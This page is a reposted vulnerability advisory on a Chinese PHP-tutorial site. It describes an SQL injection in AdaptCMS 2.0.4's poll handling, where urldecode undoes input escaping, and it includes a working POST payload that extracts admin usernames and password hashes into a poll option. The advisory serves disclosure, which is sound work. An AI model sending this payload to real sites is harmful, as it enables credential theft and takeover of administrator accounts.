网站地图    收藏   

主页 > 后端 > 网站安全 >

AdaptCMS 2.0.4 SQL注射 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 题目: AdaptCMS = 2.0.4 SQL Injection vulnerability作者: Kallimero官网 http://www.adaptcms.com/下载地址 http://www.insanevisions.com/page/3/Downloads/影响版本: 2.0.4测试系统: Debian介绍......

题目: AdaptCMS <= 2.0.4 SQL Injection vulnerability
作者: Kallimero
官网 http://www.adaptcms.com/
下载地址 http://www.insanevisions.com/page/3/Downloads/
影响版本: 2.0.4
测试系统: Debian
  
介绍
============
  
As you know, I love fun and tricky SQL injections.
AdaptCMS is vulnerable to a really unusual one.
  
  
缺陷
========
  
  
First let's see the code :
  
---------------[config.php]---------------
  
Line 34 :
array_map('clean', $_POST);
  
---------------[config.php]---------------
  
clean() acts like addslashes.
  
But a couple of lines after:
  
---------------[config.php]---------------
ligne 111: www.2cto.com
  
    mysql_query("INSERT INTO ".$pre."polls VALUES (null,
'".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '',
'".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')");
---------------[config.php]---------------
  
w00t an SQL injection. $_POST['question'] is urldecoded after the
superglobal's clean. That's why we can easily inject our SQL request.
(Without ENT_QUOTES, the simple quote pass through htmlentities() ).
  
  
利用测试
=========
  
Ok, now we have to add a second INSERT query, to insert a custom choice in
the poll, which obviously contain the admin creditentials.
A simple POST http request such as:
article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660),
(null, 0, (select concat(username, 0x3a, password) from adapt_users),
'option', '', 1, 1337, 1349597648  )-- -
  
Now check homepage, and enjoy the admin creditentials.
  
如何修复:
============
  
There is many SQL injections in this CMS ($_SERVER vars are vulnerables as
well), and others funkies vulnz.
changing your cms seems appropriate until they fix thoses issues.
   

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论